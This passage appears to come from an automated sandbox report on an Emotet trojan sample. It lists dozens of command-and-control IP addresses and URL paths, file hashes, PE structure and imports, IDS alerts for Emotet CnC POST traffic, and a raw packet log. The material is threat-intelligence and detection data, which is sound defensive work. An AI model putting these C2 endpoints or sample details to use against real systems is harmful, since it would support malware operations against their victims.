              11888TelevisionInternacionalSAdeCVMXtrue
              139.162.108.71
              unknownNetherlands
              63949LINODE-APLinodeLLCUStrue
              156.155.166.221
              unknownSouth Africa
              37611AfrihostZAtrue
              104.32.141.43
              unknownUnited States
              20001TWC-20001-PACWESTUStrue
              94.1.108.190
              unknownUnited Kingdom
              5607BSKYB-BROADBAND-ASGBtrue
              87.106.139.101
              unknownGermany
              8560ONEANDONE-ASBrauerstrasse48DEtrue
              213.196.135.145
              unknownSwitzerland
              21040DATAPARKCHtrue
              62.30.7.67
              unknownUnited Kingdom
              5089NTLGBtrue
              79.98.24.39
              unknownLithuania
              62282RACKRAYUABRakrejusLTtrue
              107.5.122.110
              unknownUnited States
              7922COMCAST-7922UStrue
              75.139.38.211
              unknownUnited States
              20115CHARTER-20115UStrue
              87.106.136.232
              unknownGermany
              8560ONEANDONE-ASBrauerstrasse48DEtrue
              110.5.16.198
              unknownJapan4685ASAHI-NETAsahiNetJPtrue
              104.131.44.150
              unknownUnited States
              14061DIGITALOCEAN-ASNUStrue
              62.75.141.82
              unknownGermany
              8972GD-EMEA-DC-SXB1DEtrue
              124.41.215.226
              unknownNepal
              17501WLINK-NEPAL-AS-APWorldLinkCommunicationsPvtLtdNPtrue
              172.91.208.86
              unknownUnited States
              20001TWC-20001-PACWESTUStrue
              37.139.21.175
              unknownNetherlands
              14061DIGITALOCEAN-ASNUStrue
              153.137.36.142
              unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
              194.187.133.160
              unknownBulgaria
              13124IBGCBGtrue
              24.43.99.75
              unknownUnited States
              20001TWC-20001-PACWESTUStrue
              95.213.236.64
              unknownRussian Federation
              49505SELECTELRUtrue
              46.105.131.79
              unknownFrance
              16276OVHFRtrue
              139.130.242.43
              unknownAustralia
              1221ASN-TELSTRATelstraCorporationLtdAUtrue
              82.80.155.43
              unknownIsrael
              8551BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneILtrue
              110.145.77.103
              unknownAustralia
              1221ASN-TELSTRATelstraCorporationLtdAUtrue
              61.92.17.12
              unknownHong Kong
              9269HKBN-AS-APHongKongBroadbandNetworkLtdHKtrue
              120.150.60.189
              unknownAustralia
              1221ASN-TELSTRATelstraCorporationLtdAUtrue
              93.147.212.206
              unknownItaly
              30722VODAFONE-IT-ASNITtrue
              91.211.88.52
              unknownUkraine
              206638HOSTFORYUAtrue
              153.232.188.106
              unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
              68.188.112.97
              unknownUnited States
              20115CHARTER-20115UStrue
              140.186.212.146
              unknownUnited States
              11232MIDCO-NETUStrue
              121.7.127.163
              unknownSingapore
              9506SINGTEL-FIBRESingtelFibreBroadbandSGtrue
              50.35.17.13
              unknownUnited States
              27017ZIPLY-FIBER-LEGACY-ASNUStrue
              157.245.99.39
              unknownUnited States
              14061DIGITALOCEAN-ASNUStrue
              203.153.216.189
              unknownIndonesia
              45291SURF-IDPTSurfindoNetworkIDtrue
              174.45.13.118
              unknownUnited States
              33588BRESNAN-33588UStrue
              162.241.242.173
              unknownUnited States
              46606UNIFIEDLAYER-AS-1UStrue
              96.249.236.156
              unknownUnited States
              701UUNETUStrue
              123.176.25.234
              unknownMaldives
              7642DHIRAAGU-MV-APDHIVEHIRAAJJEYGEGULHUNPLCMVtrue
              85.105.205.77
              unknownTurkey
              9121TTNETTRtrue
              74.120.55.163
              unknownCanada
              32315WJBTN-ASCAtrue
              200.114.213.233
              unknownArgentina
              10318TelecomArgentinaSAARtrue
              50.91.114.38
              unknownUnited States
              33363BHN-33363UStrue
              78.24.219.147
              unknownRussian Federation
              29182THEFIRST-ASRUtrue
              24.179.13.119
              unknownUnited States
              20115CHARTER-20115UStrue
              139.99.158.11
              unknownCanada
              16276OVHFRtrue
              201.173.217.124
              unknownMexico
              11888TelevisionInternacionalSAdeCVMXtrue
              134.209.36.254
              unknownUnited States
              14061DIGITALOCEAN-ASNUStrue
              75.80.124.4
              unknownUnited States
              20001TWC-20001-PACWESTUStrue
              195.251.213.56
              unknownGreece
              12364UOMGRtrue
              121.124.124.40
              unknownKorea Republic of
              9318SKB-ASSKBroadbandCoLtdKRtrue
              47.144.21.12
              unknownUnited States
              5650FRONTIER-FRTRUStrue
              139.59.60.244
              unknownSingapore
              14061DIGITALOCEAN-ASNUStrue
              61.19.246.238
              unknownThailand
              9335CAT-CLOUD-APCATTelecomPublicCompanyLimitedTHtrue
              168.235.67.138
              unknownUnited States
              3842RAMNODEUStrue
              137.59.187.107
              unknownHong Kong
              18106VIEWQWEST-SG-APViewqwestPteLtdSGtrue
              219.74.18.66
              unknownSingapore
              9506SINGTEL-FIBRESingtelFibreBroadbandSGtrue
              78.187.156.31
              unknownTurkey
              9121TTNETTRtrue
              188.219.31.12
              unknownItaly
              30722VODAFONE-IT-ASNITtrue
              83.169.36.251
              unknownGermany
              20773GODADDYDEtrue
              74.134.41.124
              unknownUnited States
              10796TWC-10796-MIDWESTUStrue
              42.200.107.142
              unknownHong Kong
              4760HKTIMS-APHKTLimitedHKtrue
              5.196.74.210
              unknownFrance
              16276OVHFRtrue
              1.221.254.82
              unknownKorea Republic of
              3786LGDACOMLGDACOMCorporationKRtrue
              74.208.45.104
              unknownUnited States
              8560ONEANDONE-ASBrauerstrasse48DEtrue
              120.138.30.150
              unknownNew Zealand
              45179SITEHOST-AS-APSiteHostNewZealandNZtrue
              84.39.182.7
              unknownSpain
              15704AS15704EStrue
              97.82.79.83
              unknownUnited States
              20115CHARTER-20115UStrue
              24.137.76.62
              unknownCanada
              11260EASTLINK-HSICAtrue
              82.225.49.121
              unknownFrance
              12322PROXADFRtrue
              37.187.72.193
              unknownFrance
              16276OVHFRtrue
              181.169.34.190
              unknownArgentina
              10318TelecomArgentinaSAARtrue
              95.179.229.244
              unknownNetherlands
              20473AS-CHOOPAUStrue
              109.74.5.95
              unknownSweden
              43948GLESYS-ASSEtrue
              74.219.172.26
              unknownUnited States
              5787SNAPONSBSUStrue
              79.137.83.50
              unknownFrance
              16276OVHFRtrue
              103.86.49.11
              unknownThailand
              58955BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTHtrue
              209.141.54.221
              unknownUnited States
              53667PONYNETUStrue
              89.216.122.92
              unknownSerbia
              31042SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemrezetrue
              185.94.252.104
              unknownGermany
              197890MEGASERVERS-DEtrue
              5.39.91.110
              unknownFrance
              16276OVHFRtrue
              137.119.36.33
              unknownUnited States
              11426TWC-11426-CAROLINASUStrue
              104.236.246.93
              unknownUnited States
              14061DIGITALOCEAN-ASNUStrue
              94.23.216.33
              unknownFrance
              16276OVHFRtrue
              219.75.128.166
              unknownJapan17511OPTAGEOPTAGEIncJPtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1495943
              Start date and time:2024-08-20 18:06:34 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 31s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:ExeFile (317).exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@3/0@0/97
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 47
              • Number of non-executed functions: 70
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: ExeFile (317).exe
              No simulations
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              94.200.114.161ExeFile (226).exeGet hashmaliciousEmotetBrowse
              • 94.200.114.161/KN2k/QHavZNk7lTSx8eJLpbP/0vd7gjsQ5TsEb0Rcx/
              ExeFile (106).exeGet hashmaliciousEmotetBrowse
              • 94.200.114.161/cHAjU/OuEQIhBlus38A7g/
              71.72.196.159ExeFile (356).exeGet hashmaliciousEmotetBrowse
              • 71.72.196.159/U79iM382/IZ04Joc/eLC1daPUos8/
              ExeFile (196).exeGet hashmaliciousEmotetBrowse
              • 71.72.196.159/2IGyEh4lLVAFVrg/6EDAF/YrTlOqfPq/7ALhWaZlzInVzVn7fD/bAqO88sEz98xOzh/VXmfH3epoFKlKrI/
              3Zn3npGt2R.docGet hashmaliciousUnknownBrowse
              • 71.72.196.159/jzbe8u/
              85.152.162.105ExeFile (360).exeGet hashmaliciousEmotetBrowse
                ExeFile (356).exeGet hashmaliciousEmotetBrowse
                  ExeFile (226).exeGet hashmaliciousEmotetBrowse
                    ExeFile (145).exeGet hashmaliciousEmotetBrowse
                      ExeFile (156).exeGet hashmaliciousEmotetBrowse
                        ExeFile (196).exeGet hashmaliciousEmotetBrowse
                          ExeFile (106).exeGet hashmaliciousEmotetBrowse
                            KBDYAK.exeGet hashmaliciousEmotetBrowse
                              task1.exeGet hashmaliciousEmotetBrowse
                                task1.exeGet hashmaliciousEmotetBrowse
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  TWC-10796-MIDWESTUSExeFile (347).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (349).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (360).exeGet hashmaliciousEmotetBrowse
                                  • 74.134.41.124
                                  ExeFile (356).exeGet hashmaliciousEmotetBrowse
                                  • 74.134.41.124
                                  ExeFile (369).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (367).exeGet hashmaliciousEmotetBrowse
                                  • 72.135.200.124
                                  ExeFile (371).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (378).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (384).exeGet hashmaliciousEmotetBrowse
                                  • 174.100.27.229
                                  ExeFile (388).exeGet hashmaliciousEmotetBrowse
                                  • 66.61.94.36
                                  TWC-10796-MIDWESTUSExeFile (347).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (349).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (360).exeGet hashmaliciousEmotetBrowse
                                  • 74.134.41.124
                                  ExeFile (356).exeGet hashmaliciousEmotetBrowse
                                  • 74.134.41.124
                                  ExeFile (369).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (367).exeGet hashmaliciousEmotetBrowse
                                  • 72.135.200.124
                                  ExeFile (371).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (378).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (384).exeGet hashmaliciousEmotetBrowse
                                  • 174.100.27.229
                                  ExeFile (388).exeGet hashmaliciousEmotetBrowse
                                  • 66.61.94.36
                                  TELECABLESpainESExeFile (360).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  ExeFile (356).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  ExeFile (226).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  ExeFile (145).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  ExeFile (156).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  ExeFile (171).exeGet hashmaliciousEmotetBrowse
                                  • 93.156.165.186
                                  ExeFile (196).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  ExeFile (106).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  jew.m68k.elfGet hashmaliciousUnknownBrowse
                                  • 188.171.114.252
                                  arm7.elfGet hashmaliciousMiraiBrowse
                                  • 188.171.226.33
                                  DU-AS1AEExeFile (360).exeGet hashmaliciousEmotetBrowse
                                  • 94.200.114.161
                                  ExeFile (356).exeGet hashmaliciousEmotetBrowse
                                  • 94.200.114.161
                                  ExeFile (377).exeGet hashmaliciousEmotetBrowse
                                  • 91.75.75.46
                                  ExeFile (384).exeGet hashmaliciousEmotetBrowse
                                  • 94.206.45.18
                                  ExeFile (39).exeGet hashmaliciousEmotetBrowse
                                  • 91.75.75.46
                                  ExeFile (64).exeGet hashmaliciousEmotetBrowse
                                  • 91.75.75.46
                                  ExeFile (22).exeGet hashmaliciousEmotetBrowse
                                  • 94.200.114.161
                                  ExeFile (285).exeGet hashmaliciousEmotetBrowse
                                  • 91.75.75.46
                                  ExeFile (226).exeGet hashmaliciousEmotetBrowse
                                  • 94.200.114.161
                                  ExeFile (145).exeGet hashmaliciousEmotetBrowse
                                  • 94.200.114.161
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):6.185263206813159
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:ExeFile (317).exe
                                  File size:437'248 bytes
                                  MD5:1d94974d27fc9127c69992d325afbc89
                                  SHA1:f238ed9987b52b8368c872804e64fea64360f0be
                                  SHA256:8c040d75defb681d1757421cad1fde62b74ba124a23e3b9ab3826d9806dcb35a
                                  SHA512:f700f54141b1d7d628bb2c64b2d6aae85225d9839d79b16c7179ccc86210723eb3d237c453b1e15fbe19eb150cc688470cb833c47b7e3a7dcd285ecc0491098b
                                  SSDEEP:6144:vXBr9LW/6DUvum8471YQvq6H/iaRT8oITZO/rVurq:vXdNDDUvum845lv7Ha+ThmZo5uG
                                  TLSH:27947B136AC4C138F4961B35F8AAEAF14391BD1A5F3882CBFEC4775B6D671809C36606
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|..L...L...L...#k..\...#k*.,...Ee..A...L...<...#k+.e...#k..M...k.[.M...#k..M...RichL...................PE..L.....e_...........
                                  Icon Hash:0e0e0f0d1e3add1f
                                  Entrypoint:0x410a9b
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x5F6508C3 [Fri Sep 18 19:21:39 2020 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:39948763cc1873dc50981ea479aab099
                                  Instruction
                                  call 00007FCFE4E11625h
                                  jmp 00007FCFE4E0D90Eh
                                  mov edi, edi
                                  push ebp
                                  mov ebp, esp
                                  mov edx, dword ptr [ebp+08h]
                                  push esi
                                  push edi
                                  test edx, edx
                                  je 00007FCFE4E0DA89h
                                  mov edi, dword ptr [ebp+0Ch]
                                  test edi, edi
                                  jne 00007FCFE4E0DA95h
                                  call 00007FCFE4E0EDF2h
                                  push 00000016h
                                  pop esi
                                  mov dword ptr [eax], esi
                                  call 00007FCFE4E0ED96h
                                  mov eax, esi
                                  jmp 00007FCFE4E0DAB5h
                                  mov eax, dword ptr [ebp+10h]
                                  test eax, eax
                                  jne 00007FCFE4E0DA86h
                                  mov byte ptr [edx], al
                                  jmp 00007FCFE4E0DA64h
                                  mov esi, edx
                                  sub esi, eax
                                  mov cl, byte ptr [eax]
                                  mov byte ptr [esi+eax], cl
                                  inc eax
                                  test cl, cl
                                  je 00007FCFE4E0DA85h
                                  dec edi
                                  jne 00007FCFE4E0DA75h
                                  test edi, edi
                                  jne 00007FCFE4E0DA93h
                                  mov byte ptr [edx], 00000000h
                                  call 00007FCFE4E0EDBCh
                                  push 00000022h
                                  pop ecx
                                  mov dword ptr [eax], ecx
                                  mov esi, ecx
                                  jmp 00007FCFE4E0DA48h
                                  xor eax, eax
                                  pop edi
                                  pop esi
                                  pop ebp
                                  ret
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  mov ecx, dword ptr [esp+04h]
                                  test ecx, 00000003h
                                  je 00007FCFE4E0DAA6h
                                  mov al, byte ptr [ecx]
                                  add ecx, 01h
                                  test al, al
                                  je 00007FCFE4E0DAD0h
                                  test ecx, 00000003h
                                  jne 00007FCFE4E0DA71h
                                  add eax, 00000000h
                                  lea esp, dword ptr [esp+00000000h]
                                  lea esp, dword ptr [esp+00000000h]
                                  mov eax, dword ptr [ecx]
                                  mov edx, 7EFEFEFFh
                                  add edx, eax
                                  xor eax, FFFFFFFFh
                                  xor eax, edx
                                  add ecx, 04h
                                  test eax, 81010100h
                                  je 00007FCFE4E0DA6Ah
                                  mov eax, dword ptr [ecx-04h]
                                  test al, al
                                  je 00007FCFE4E0DAB4h
                                  test ah, ah
                                  je 00007FCFE4E0DAA6h
                                  Programming Language:
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [IMP] VS2008 SP1 build 30729
                                  • [C++] VS2010 build 30319
                                  • [EXP] VS2010 build 30319
                                  • [LNK] VS2010 build 30319
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x1c9f00x42.rdata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1c01c0x8c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x4c1f0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x6f0000xeec.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x191f00x1c.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1b8380x40.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x190000x1ac.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x17a6e0x17c002918294d11fcf50d51f870e66a4e619eFalse0.5352487664473684DOS executable (COM)6.120585434914318IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x190000x3a320x3c007fb0ff3fe31bdade0801fee9c309da5aFalse0.3529296875data4.851518814724672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x1d0000x416c0x1000c6306a330127025aa96c1b57a0fcd902False0.221923828125data2.5497119214608133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x220000x4c1f00x4c200add876cb58db3633c854af0e75fe9ec8False0.31388867508210183data6.141207657208505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x6f0000x1d300x1e00ea9aac25c86f4cd5d2db5957b7bc6e8fFalse0.4217447916666667data4.176257282412653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  DAGHHHHHTY0x225200xde00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsEnglishUnited States0.506809543918919
                                  RT_ICON0x303200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x328c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x34e700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x374180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x399c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x3bf680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x3e5100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x40ab80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x430600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x456080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x47bb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x4a1580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x4c7000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x4eca80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x512500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x537f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x55da00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x583480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x5a8f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x5ce980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_GROUP_ICON0x5f4400x11edataEnglishUnited States0.24125874125874125
                                  RT_MANIFEST0x5f5600x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786
                                  None0x5f6bc0xeb33dataEnglishUnited States1.0004318147846738
                                  DLLImport
                                  KERNEL32.dllVirtualAlloc, Process32NextW, Process32FirstW, CreateToolhelp32Snapshot, CreateThread, SetStdHandle, SetFilePointer, WriteConsoleW, LoadLibraryW, GetStringTypeW, LCMapStringW, FlushFileBuffers, GetConsoleMode, GetConsoleCP, HeapReAlloc, MultiByteToWideChar, CreateProcessW, OpenProcess, TerminateProcess, QueryFullProcessImageNameW, CloseHandle, GetCurrentProcess, GetLastError, FormatMessageW, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetSystemTimeAsFileTime, HeapAlloc, RaiseException, RtlUnwind, EncodePointer, DecodePointer, GetCommandLineA, HeapSetInformation, GetStartupInfoW, HeapFree, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, GetProcAddress, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, CreateFileW
                                  USER32.dllSendMessageW, CreateWindowExW, wsprintfW, LoadIconW, LoadCursorW, RegisterClassExW, SetTimer, UpdateWindow, GetMessageW, TranslateMessage, DispatchMessageW, PostQuitMessage, ShowWindow, MessageBoxW, SetWindowTextW, GetWindowTextW, DefWindowProcW
                                  ADVAPI32.dllGetUserNameW, GetTokenInformation, LookupAccountSidW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges
                                  COMCTL32.dllInitCommonControlsEx
                                  PSAPI.DLLGetProcessMemoryInfo
                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                  NameOrdinalAddress
                                  Run10x40ec40
                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States
                                  TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                  2024-08-20T18:08:26.272087+0200TCP2030868ET MALWARE Win32/Emotet CnC Activity (POST) M101497398080192.168.2.4120.138.30.150
                                  2024-08-20T18:08:30.100075+0200TCP2854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M1314974080192.168.2.494.23.216.33
                                  2024-08-20T18:08:21.130577+0200TCP2854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131497378080192.168.2.4134.209.36.254
                                  2024-08-20T18:09:00.006506+0200TCP2854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131497428080192.168.2.4137.59.187.107
                                  2024-08-20T18:07:56.975897+0200TCP2854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M1314973080192.168.2.471.72.196.159
                                  2024-08-20T18:09:32.382105+0200TCP2854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M1314974580192.168.2.4156.155.166.221
                                  2024-08-20T18:07:21.955224+0200TCP2030868ET MALWARE Win32/Emotet CnC Activity (POST) M10149744443192.168.2.461.19.246.238
                                  2024-08-20T18:08:36.308902+0200TCP2854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131497418080192.168.2.4157.245.99.39
                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 20, 2024 18:07:35.557763100 CEST4973080192.168.2.471.72.196.159
                                  Aug 20, 2024 18:07:35.562776089 CEST804973071.72.196.159192.168.2.4
                                  Aug 20, 2024 18:07:35.562850952 CEST4973080192.168.2.471.72.196.159
                                  Aug 20, 2024 18:07:35.563587904 CEST4973080192.168.2.471.72.196.159
                                  Aug 20, 2024 18:07:35.563635111 CEST4973080192.168.2.471.72.196.159
                                  Aug 20, 2024 18:07:35.568464994 CEST804973071.72.196.159192.168.2.4
                                  Aug 20, 2024 18:07:35.568480015 CEST804973071.72.196.159192.168.2.4
                                  Aug 20, 2024 18:07:35.568511009 CEST804973071.72.196.159192.168.2.4
                                  Aug 20, 2024 18:07:35.568521023 CEST804973071.72.196.159192.168.2.4
                                  Aug 20, 2024 18:07:35.573182106 CEST804973071.72.196.159192.168.2.4
                                  Aug 20, 2024 18:07:56.975836039 CEST804973071.72.196.159192.168.2.4
                                  Aug 20, 2024 18:07:56.975897074 CEST4973080192.168.2.471.72.196.159
                                  Aug 20, 2024 18:07:56.976006031 CEST4973080192.168.2.471.72.196.159
                                  Aug 20, 2024 18:07:56.980730057 CEST804973071.72.196.159192.168.2.4
                                  Aug 20, 2024 18:07:59.750101089 CEST497378080192.168.2.4134.209.36.254
                                  Aug 20, 2024 18:07:59.755081892 CEST808049737134.209.36.254192.168.2.4
                                  Aug 20, 2024 18:07:59.755170107 CEST497378080192.168.2.4134.209.36.254
                                  Aug 20, 2024 18:07:59.755335093 CEST497378080192.168.2.4134.209.36.254
                                  Aug 20, 2024 18:07:59.755386114 CEST497378080192.168.2.4134.209.36.254
                                  Aug 20, 2024 18:07:59.760215998 CEST808049737134.209.36.254192.168.2.4
                                  Aug 20, 2024 18:07:59.760226965 CEST808049737134.209.36.254192.168.2.4
                                  Aug 20, 2024 18:07:59.760236979 CEST808049737134.209.36.254192.168.2.4
                                  Aug 20, 2024 18:07:59.760253906 CEST808049737134.209.36.254192.168.2.4
                                  Aug 20, 2024 18:07:59.760596991 CEST808049737134.209.36.254192.168.2.4
                                  Aug 20, 2024 18:08:21.130495071 CEST808049737134.209.36.254192.168.2.4
                                  Aug 20, 2024 18:08:21.130577087 CEST497378080192.168.2.4134.209.36.254
                                  Aug 20, 2024 18:08:21.130683899 CEST497378080192.168.2.4134.209.36.254
                                  Aug 20, 2024 18:08:21.135564089 CEST808049737134.209.36.254192.168.2.4
                                  Aug 20, 2024 18:08:24.217974901 CEST497398080192.168.2.4120.138.30.150
                                  Aug 20, 2024 18:08:24.223268032 CEST808049739120.138.30.150192.168.2.4
                                  Aug 20, 2024 18:08:24.223378897 CEST497398080192.168.2.4120.138.30.150
                                  Aug 20, 2024 18:08:24.223545074 CEST497398080192.168.2.4120.138.30.150
                                  Aug 20, 2024 18:08:24.223578930 CEST497398080192.168.2.4120.138.30.150
